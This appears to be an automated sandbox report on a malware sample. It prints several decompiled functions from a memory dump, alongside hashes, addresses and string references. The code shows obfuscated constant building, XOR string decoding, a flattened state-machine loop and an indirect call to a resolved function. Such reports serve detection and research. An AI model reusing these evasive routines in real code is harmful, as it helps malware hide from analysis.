Instruction ID: e410bbd594e1358f32ae0a9c584c8ee4201e8a34bbb7f8da3b5803138acb5f51
Opcode Fuzzy Hash: 44b181504879ea0d1ed24928566f6a986cfd210e4bee9c1ecd534ccc22b94645
Instruction Fuzzy Hash: A24187B15183028BD715CF20D58955FBBE1FBC8758F104A1EF589662A0D7B48A5A8F82

Uniqueness

Uniqueness Score: -1.00%

Function 002431E2, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002431E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00231210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E0024375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}

0x002431f0
0x002431f3
0x002431fa
0x00243201
0x00243208
0x00243214
0x00243219
0x0024321e
0x00243225
0x0024322c
0x00243230
0x00243237
0x0024323e
0x00243245
0x0024324c
0x00243253
0x0024325a
0x00243261
0x00243264
0x0024326b
0x00243272
0x00243276
0x0024327d
0x00243281
0x00243288
0x0024328f
0x00243296
0x0024329d
0x002432a7
0x002432aa
0x002432b3
0x002432b7
0x002432be
0x002432c5
0x002432cc
0x002432d0
0x002432d7
0x002432de
0x002432e2
0x002432e9
0x002432f0
0x002432f7
0x002432fb
0x00243302
0x00243314
0x00243321
0x00243323
0x00243330
0x00243332
0x00243338
0x0024333e
0x00000000
0x00000000
0x00243340
0x00000000
0x0024333e
0x00243342
0x00243344
0x00243344
0x00243348
0x0024336d
0x00243372
0x0024337c

Strings

`Zye, xrefs: 00243201
J5, xrefs: 002432E2

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: `Zye$J5
API String ID: 0-1569392922
Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction ID: 1c9c15c1694841710717b12a542b142c33d6dd68a98c02e9d6c7df59e5c885fe
Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction Fuzzy Hash: 274113B1C1021DEBEF59CFA1C94A9EEBBB5FB14304F108199E111B62A0D7B94B54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0024889D, Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0024889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0023602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00238736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}

0x002488a4
0x002488a9
0x002488aa
0x002488af
0x002488b7
0x002488ba
0x002488be
0x002488c2
0x002488ca
0x002488d2
0x002488da
0x002488e8
0x002488ed
0x002488f1
0x002488f9
0x00248901
0x0024890f
0x00248912
0x00248916
0x0024891e
0x00248922
0x00248925
0x00248927
0x0024892b
0x0024892f
0x0024893f
0x0024894a
0x00248959
0x0024895b
0x00248963
0x0024896a
0x0024897b
0x00248980
0x00248982
0x00248986
0x00248986
0x00248988
0x0024898b
0x00248990
0x00248998
0x0024899e
0x002489a2
0x002489ab
0x002489ac
0x002489b3
0x002489b7
0x002489bb
0x002489bb
0x002489c5
0x002489c5
0x002489d2

Strings

Q`, xrefs: 002488CA
{K, xrefs: 00248916

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Q`${K
API String ID: 0-3942002812
Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction ID: 22778ad60c91bb4fa69981675429a4a7ee11a7771355100465bfc311c33e4ae7
Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction Fuzzy Hash: AF31BB72A187128FD314DF29C48446BF7E0FF88318F414A2DE489A7250DB74E90A8B86

Uniqueness

Uniqueness Score: -1.00%

Function 0024878F, Relevance: 2.6, Strings: 2, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0024878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0023602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00238736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}

0x00248799
0x0024879a
0x0024879f
0x002487a0
0x002487a5
0x002487ad
0x002487ad
0x002487b0
0x002487b8
0x002487c0
0x002487c8
0x002487d0
0x002487d8
0x002487e0
0x002487e8
0x002487f0
0x002487f8
0x002487fc
0x002487ff
0x00248801
0x00248805
0x00248809
0x00248819
0x00248824
0x00248832
0x00248834
0x0024883c
0x00248844
0x00248846
0x00248857
0x0024885c
0x0024885e
0x00248862
0x00248862
0x00248864
0x00248867
0x00248869
0x00248870
0x00248873
0x00248876
0x00248879
0x0024887f
0x00248880
0x00248883
0x00248887
0x00248887
0x00248890
0x00248890
0x0024889c

Strings

j, xrefs: 002487E0
5Ur, xrefs: 002487D8

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5Ur$j
API String ID: 0-2435424154
Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction ID: 16e8732b170713eca28be14933234b49325343d7a04c270b12e534ebe0a762fb
Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction Fuzzy Hash: 30318D72A193018FD318CF29C88545BFBE0EF98714F454B5DF989A7251D734E90ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00249586, Relevance: 2.6, Strings: 2, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00249586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x24c860);
					_push(_v20);
					_t80 = E0024878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00246965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00242025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

0x0024958c
0x00249590
0x00249597
0x0024959e
0x002495a2
0x002495a6
0x002495ad
0x002495b4
0x002495bb
0x002495c2
0x002495cf
0x002495d6
0x002495dd
0x002495e6
0x002495ed
0x002495f0
0x002495f7
0x002495fe
0x00249605
0x0024960c
0x00249613
0x0024961a
0x00249621
0x00249628
0x0024962f
0x00249636
0x0024963d
0x00249644
0x0024964b
0x0024964f
0x00249656
0x00249661
0x00249668
0x0024966b
0x0024966f
0x00249679
0x0024967c
0x0024967e
0x00249681
0x00249686
0x0024968f
0x00249694
0x00249697
0x00249699
0x002496a1
0x002496ab
0x002496ad
0x002496ad
0x002496ba
0x002496c1
0x002496c8

Strings

I, xrefs: 002495A6
4, xrefs: 00249628

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 4$I
API String ID: 0-2585635819
Opcode ID: 8fd5369d6799bd54ecdbb129b27ccd2cbbd194491ded85fea06683789b4f38b4
Instruction ID: 5162b11a00b8ca7b709bc65c3caaf85bca6e0c9328ec849e39eb9819e6616983
Opcode Fuzzy Hash: 8fd5369d6799bd54ecdbb129b27ccd2cbbd194491ded85fea06683789b4f38b4
Instruction Fuzzy Hash: 1C4112B1D0020AEBEF08DFA1C94A6EEBBB0FB44314F208159D411B6290D3B9AB55CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00237998, Relevance: 2.6, Strings: 2, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00237998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0023602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0024360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00242674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}

0x0023799f
0x002379a3
0x002379a6
0x002379a9
0x002379aa
0x002379ad
0x002379b2
0x002379bb
0x002379bf
0x002379c6
0x002379cd
0x002379d4
0x002379db
0x002379e7
0x002379ec
0x002379f1
0x002379f8
0x002379ff
0x00237a06
0x00237a0d
0x00237a14
0x00237a19
0x00237a1c
0x00237a23
0x00237a2a
0x00237a31
0x00237a38
0x00237a3f
0x00237a46
0x00237a4a
0x00237a51
0x00237a58
0x00237a63
0x00237a66
0x00237a6a
0x00237a71
0x00237a84
0x00237a9d
0x00237aa2
0x00237aa8
0x00237ab0

Strings

JX, xrefs: 00237A06
[m1, xrefs: 002379D4

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: [m1$JX
API String ID: 0-848362422
Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction ID: bfe028f06cca24ec59237103dad3180a3a3025ae38e566775aaca1ac43e469d8
Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction Fuzzy Hash: 8D310475900209FBCF58CFA5D94A89EBBB5FF44314F20C059E9196A260D3799B24DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00239A37, Relevance: 1.6, Strings: 1, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00239A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00237998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00237998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0024360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0024360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00238736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0024360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002450F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00247F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00237998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0024360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0024360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

0x00239a43
0x00239a46
0x00239a48
0x00239a4a
0x00239a4d
0x00239a4e
0x00239a4f
0x00239a54
0x00239a5b
0x00239a5e
0x00239a64
0x00239a68
